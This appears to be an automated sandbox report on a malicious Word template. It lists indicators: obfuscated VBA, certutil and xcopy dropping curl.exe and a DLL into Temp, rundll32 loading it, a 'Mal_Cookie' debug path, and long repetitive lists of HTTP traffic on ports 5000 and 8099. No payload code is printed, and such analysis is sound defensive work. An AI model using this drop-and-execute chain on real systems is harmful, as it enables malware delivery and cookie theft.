Source:	Binary string: D:\c++\Mal_Cookie_x64\x64\Release\mscorsvc.pdb source: certutil.exe, 0000000E.00000003.2191196676.0000000004907000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.5554128263.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmp, certutil.exe, 00000022.00000003.2768980516.0000000004FA2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000002.4259710787.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmp

Source: Element design set.dotx.0.dr

Initial sample: OLE indicators vbamacros = False

Data Obfuscation

Document contains an embedded VBA with many string operations indicating source code obfuscation

Source: VBA code instrumentation

OLE, VBA macro, High number of string operations: Module ThisDocument

Name: ThisDocument

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\curl.exe

Code function: 13_2_0087D33A GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,LoadLibraryExA,GetSystemDirectoryA,malloc,malloc,GetSystemDirectoryA,LoadLibraryA,free,free,

13_2_0087D33A

PE file contains sections with non-standard names

Source: mscorsvc.dll.14.dr

Static PE information: section name: _RDATA

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\rundll32.exe

Code function: 16_2_00007FFD92C4A381 push rdx; ret

16_2_00007FFD92C4A38B

Drops PE files

Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Local\Temp\curl.exe			Jump to dropped file
Source: C:\Windows\SysWOW64\certutil.exe	File created: C:\Users\user\AppData\Local\Temp\mscorsvc.dll			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 8099
Source: unknown	Network traffic detected: HTTP traffic on port 8099 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 8099 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 49195 -> 8099
Source: unknown	Network traffic detected: HTTP traffic on port 8099 -> 49195
Source: unknown	Network traffic detected: HTTP traffic on port 49209 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49209
Source: unknown	Network traffic detected: HTTP traffic on port 49210 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49210
Source: unknown	Network traffic detected: HTTP traffic on port 49211 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49211
Source: unknown	Network traffic detected: HTTP traffic on port 49212 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49212
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49212
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49212
Source: unknown	Network traffic detected: HTTP traffic on port 49214 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49214
Source: unknown	Network traffic detected: HTTP traffic on port 49215 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49215
Source: unknown	Network traffic detected: HTTP traffic on port 49216 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49216
Source: unknown	Network traffic detected: HTTP traffic on port 49218 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49218
Source: unknown	Network traffic detected: HTTP traffic on port 49219 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49219
Source: unknown	Network traffic detected: HTTP traffic on port 49220 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49220
Source: unknown	Network traffic detected: HTTP traffic on port 49221 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49221
Source: unknown	Network traffic detected: HTTP traffic on port 49222 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49222
Source: unknown	Network traffic detected: HTTP traffic on port 49223 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49223
Source: unknown	Network traffic detected: HTTP traffic on port 49224 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49224
Source: unknown	Network traffic detected: HTTP traffic on port 49225 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49225
Source: unknown	Network traffic detected: HTTP traffic on port 49226 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49226
Source: unknown	Network traffic detected: HTTP traffic on port 49227 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49227
Source: unknown	Network traffic detected: HTTP traffic on port 49228 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49228
Source: unknown	Network traffic detected: HTTP traffic on port 49229 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49229
Source: unknown	Network traffic detected: HTTP traffic on port 49230 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49230
Source: unknown	Network traffic detected: HTTP traffic on port 49231 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49231
Source: unknown	Network traffic detected: HTTP traffic on port 49232 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49232
Source: unknown	Network traffic detected: HTTP traffic on port 49234 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49234
Source: unknown	Network traffic detected: HTTP traffic on port 49235 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49235
Source: unknown	Network traffic detected: HTTP traffic on port 49236 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49236
Source: unknown	Network traffic detected: HTTP traffic on port 49237 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49237
Source: unknown	Network traffic detected: HTTP traffic on port 49238 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49238
Source: unknown	Network traffic detected: HTTP traffic on port 49239 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49239
Source: unknown	Network traffic detected: HTTP traffic on port 49240 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49240
Source: unknown	Network traffic detected: HTTP traffic on port 49241 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49241
Source: unknown	Network traffic detected: HTTP traffic on port 49242 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49242
Source: unknown	Network traffic detected: HTTP traffic on port 49243 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49243
Source: unknown	Network traffic detected: HTTP traffic on port 49244 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49244
Source: unknown	Network traffic detected: HTTP traffic on port 49245 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49245
Source: unknown	Network traffic detected: HTTP traffic on port 49246 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49246
Source: unknown	Network traffic detected: HTTP traffic on port 49247 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49247
Source: unknown	Network traffic detected: HTTP traffic on port 49248 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49248
Source: unknown	Network traffic detected: HTTP traffic on port 49249 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49249
Source: unknown	Network traffic detected: HTTP traffic on port 49250 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49250
Source: unknown	Network traffic detected: HTTP traffic on port 49251 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49251
Source: unknown	Network traffic detected: HTTP traffic on port 49252 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49252
Source: unknown	Network traffic detected: HTTP traffic on port 49253 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49253
Source: unknown	Network traffic detected: HTTP traffic on port 49254 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49254
Source: unknown	Network traffic detected: HTTP traffic on port 49255 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49255
Source: unknown	Network traffic detected: HTTP traffic on port 49256 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49256
Source: unknown	Network traffic detected: HTTP traffic on port 49257 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49257
Source: unknown	Network traffic detected: HTTP traffic on port 49258 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49258
Source: unknown	Network traffic detected: HTTP traffic on port 49259 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49259
Source: unknown	Network traffic detected: HTTP traffic on port 49260 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49260
Source: unknown	Network traffic detected: HTTP traffic on port 49261 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49261
Source: unknown	Network traffic detected: HTTP traffic on port 49262 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49262
Source: unknown	Network traffic detected: HTTP traffic on port 49263 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49263
Source: unknown	Network traffic detected: HTTP traffic on port 49264 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49264
Source: unknown	Network traffic detected: HTTP traffic on port 49265 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49265
Source: unknown	Network traffic detected: HTTP traffic on port 49266 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49266
Source: unknown	Network traffic detected: HTTP traffic on port 49267 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49267
Source: unknown	Network traffic detected: HTTP traffic on port 49269 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49269
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49269
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49269
Source: unknown	Network traffic detected: HTTP traffic on port 49270 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49270
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49270
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49270
Source: unknown	Network traffic detected: HTTP traffic on port 49271 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49271
Source: unknown	Network traffic detected: HTTP traffic on port 49272 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49272
Source: unknown	Network traffic detected: HTTP traffic on port 49273 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49273
Source: unknown	Network traffic detected: HTTP traffic on port 49274 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49274
Source: unknown	Network traffic detected: HTTP traffic on port 49275 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49275
Source: unknown	Network traffic detected: HTTP traffic on port 49276 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49276
Source: unknown	Network traffic detected: HTTP traffic on port 49277 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49277
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49277
Source: unknown	Network traffic detected: HTTP traffic on port 49278 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49278
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49278
Source: unknown	Network traffic detected: HTTP traffic on port 49279 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49279
Source: unknown	Network traffic detected: HTTP traffic on port 49280 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49280
Source: unknown	Network traffic detected: HTTP traffic on port 49281 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49281
Source: unknown	Network traffic detected: HTTP traffic on port 49282 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49282
Source: unknown	Network traffic detected: HTTP traffic on port 49283 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49283
Source: unknown	Network traffic detected: HTTP traffic on port 49284 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49284
Source: unknown	Network traffic detected: HTTP traffic on port 49285 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49285
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49285
Source: unknown	Network traffic detected: HTTP traffic on port 49286 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49286
Source: unknown	Network traffic detected: HTTP traffic on port 49287 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49287
Source: unknown	Network traffic detected: HTTP traffic on port 49288 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49288
Source: unknown	Network traffic detected: HTTP traffic on port 49289 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49289
Source: unknown	Network traffic detected: HTTP traffic on port 49290 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49290
Source: unknown	Network traffic detected: HTTP traffic on port 49291 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49291
Source: unknown	Network traffic detected: HTTP traffic on port 49292 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49292
Source: unknown	Network traffic detected: HTTP traffic on port 49293 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49293
Source: unknown	Network traffic detected: HTTP traffic on port 49294 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49294
Source: unknown	Network traffic detected: HTTP traffic on port 49295 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49295
Source: unknown	Network traffic detected: HTTP traffic on port 49296 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49296
Source: unknown	Network traffic detected: HTTP traffic on port 49297 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49297
Source: unknown	Network traffic detected: HTTP traffic on port 49298 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49298
Source: unknown	Network traffic detected: HTTP traffic on port 49299 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49299
Source: unknown	Network traffic detected: HTTP traffic on port 49300 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49300
Source: unknown	Network traffic detected: HTTP traffic on port 49301 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49301
Source: unknown	Network traffic detected: HTTP traffic on port 49302 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49302
Source: unknown	Network traffic detected: HTTP traffic on port 49303 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49303
Source: unknown	Network traffic detected: HTTP traffic on port 49304 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49304
Source: unknown	Network traffic detected: HTTP traffic on port 49305 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49305
Source: unknown	Network traffic detected: HTTP traffic on port 49306 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49306
Source: unknown	Network traffic detected: HTTP traffic on port 49307 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49307
Source: unknown	Network traffic detected: HTTP traffic on port 49308 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49308
Source: unknown	Network traffic detected: HTTP traffic on port 49309 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49309
Source: unknown	Network traffic detected: HTTP traffic on port 49310 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49310
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49310
Source: unknown	Network traffic detected: HTTP traffic on port 49311 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49311
Source: unknown	Network traffic detected: HTTP traffic on port 49312 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49312
Source: unknown	Network traffic detected: HTTP traffic on port 49313 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49313
Source: unknown	Network traffic detected: HTTP traffic on port 49314 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49314
Source: unknown	Network traffic detected: HTTP traffic on port 49315 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49315
Source: unknown	Network traffic detected: HTTP traffic on port 49316 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49316
Source: unknown	Network traffic detected: HTTP traffic on port 49317 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49317
Source: unknown	Network traffic detected: HTTP traffic on port 49318 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49318
Source: unknown	Network traffic detected: HTTP traffic on port 49319 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49319
Source: unknown	Network traffic detected: HTTP traffic on port 49320 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49320
Source: unknown	Network traffic detected: HTTP traffic on port 49321 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49321
Source: unknown	Network traffic detected: HTTP traffic on port 49322 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49322
Source: unknown	Network traffic detected: HTTP traffic on port 49323 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49323
Source: unknown	Network traffic detected: HTTP traffic on port 49324 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49324
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 49327 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49327
Source: unknown	Network traffic detected: HTTP traffic on port 49328 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49328
Source: unknown	Network traffic detected: HTTP traffic on port 49329 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49329
Source: unknown	Network traffic detected: HTTP traffic on port 49330 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49330
Source: unknown	Network traffic detected: HTTP traffic on port 49331 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49331
Source: unknown	Network traffic detected: HTTP traffic on port 49332 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49332
Source: unknown	Network traffic detected: HTTP traffic on port 49333 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49333
Source: unknown	Network traffic detected: HTTP traffic on port 49334 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49334
Source: unknown	Network traffic detected: HTTP traffic on port 49335 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49335
Source: unknown	Network traffic detected: HTTP traffic on port 49336 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49336
Source: unknown	Network traffic detected: HTTP traffic on port 49337 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49337
Source: unknown	Network traffic detected: HTTP traffic on port 49338 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49338

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
